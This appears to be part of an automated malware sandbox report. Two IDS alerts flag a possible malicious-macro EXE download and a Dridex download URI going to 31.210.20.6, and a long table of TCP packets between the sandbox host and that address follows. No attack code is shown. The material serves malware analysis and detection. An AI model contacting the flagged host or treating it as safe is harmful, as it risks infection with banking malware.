05/04/21-22:01:56.453454	TCP	2022550	ET TROJAN Possible Malicious Macro DL EXE Feb 2016	49167	80	192.168.2.22	31.210.20.6
05/04/21-22:01:56.453454	TCP	2021245	ET TROJAN Possible Dridex Download URI Struct with no referer	49167	80	192.168.2.22	31.210.20.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 22:01:56.403867006 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.452884912 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.453023911 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.453454018 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.503766060 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505009890 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505034924 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505050898 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505068064 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505080938 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.505085945 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505105019 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505109072 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.505120039 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505129099 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.505137920 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505146980 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.505156994 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505171061 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.505175114 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505202055 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.505213022 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.522548914 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555527925 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555557966 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555579901 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555603981 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555608034 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555630922 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555633068 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555635929 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555656910 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555663109 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555672884 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555691004 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555702925 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555717945 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555732012 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555742979 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555767059 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555768967 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555790901 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555793047 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555815935 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555816889 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555839062 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555840969 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555864096 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555864096 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555876970 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555895090 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555906057 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555922985 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555936098 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555948973 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555973053 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555974007 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555985928 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555999041 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.556020021 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.556021929 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.556045055 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.556056976 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.558605909 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.604773045 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.604809046 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.604825974 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.604842901 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.604942083 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.604945898 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605000019 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605022907 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605025053 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605040073 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605045080 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605067968 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605076075 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605087042 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605093956 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605106115 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605118990 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605123997 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605140924 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605156898 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605164051 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605175018 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605186939 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605195999 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605211973 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605223894 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605235100 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605242968 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605257988 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605281115 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605283022 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605295897 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605307102 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605315924 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605329990 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605340004 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605351925 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605364084 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605375051 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605396986 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605417967 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605432034 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605454922 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605470896 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605477095 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605488062 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605500937 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605509043 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605523109 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605532885 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605545044 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605554104 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605567932 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605578899 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605592966 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605602026 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605616093 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605626106 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605639935 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605649948 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605664015 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605671883 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605685949 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605696917 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605707884 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605710030 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605729103 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.605741978 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.605760098 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.607724905 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.607755899 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.607779980 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.607800961 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.607810974 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.607832909 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.607836962 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.607985020 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.654498100 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.654525042 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.654638052 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.654650927 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.654670000 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.654700041 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.654712915 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.654732943 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.654750109 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.654764891 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.654771090 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.654783010 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.654783010 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.654797077 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.654800892 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.654813051 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.654822111 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.654830933 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.654863119 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.654895067 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.654933929 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.654958963 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.654994965 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.655026913 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.655044079 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.655059099 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.655072927 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.655097008 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.655113935 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.655128956 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.655143976 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.656647921 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657102108 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657144070 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657160044 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657169104 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657180071 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657193899 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657196045 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657219887 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657229900 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657244921 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657253981 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657274008 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657279015 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657299042 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657310009 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657322884 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657334089 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657347918 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657357931 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657371998 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657402039 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657411098 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657419920 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657444000 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657459021 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657466888 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657475948 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657490969 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657501936 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657519102 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657527924 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657543898 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657556057 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657567978 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657591105 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657599926 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657610893 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657613993 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657629967 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657639027 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657661915 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657681942 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657707930 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657717943 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657732964 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657732964 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657747984 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657758951 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657768011 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657783985 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657802105 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657809019 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657819986 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657833099 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657850027 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657855034 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657871962 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657876968 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657891035 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657903910 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657912970 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657934904 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.657947063 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.657968998 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.658591032 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.703255892 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.703293085 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.703306913 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.703327894 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.703347921 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.703393936 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.703417063 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.703423023 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.703439951 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.703458071 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.703461885 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.703465939 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.703480959 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.706100941 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.706136942 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.706160069 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.706187010 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.706203938 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.706211090 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.706229925 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.706234932 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.706235886 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.706245899 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.706271887 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.706532001 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708208084 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708241940 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708291054 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708312988 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708461046 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708487988 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708506107 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708514929 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708525896 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708535910 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708554029 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708560944 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708570004 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708585978 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708595991 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708620071 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708661079 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708684921 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708698988 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708710909 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708719969 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708735943 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708745956 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708764076 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708772898 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708790064 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708798885 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708812952 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708825111 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708837986 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708841085 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708863974 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708873034 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708889008 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708898067 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708910942 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708914042 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708925009 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708939075 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708941936 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708969116 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.708976030 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.708997011 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.709007025 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.709021091 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.709031105 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.709045887 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.709057093 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.709069967 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.709073067 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.709094048 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.709105015 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.709119081 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.709122896 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.709144115 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.709155083 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.709172010 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.709172010 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.709198952 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.709208012 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.709232092 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.709242105 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.709258080 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.709259033 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.709283113 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.709295034 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.709306002 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.709316969 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.709333897 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.709347963 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.709359884 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.709366083 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.709405899 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.713371038 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.715279102 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.754127026 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.754158020 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.754169941 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.754183054 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.754198074 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.754209995 CEST	80	49167	31.210.20.6	192.168.2.22
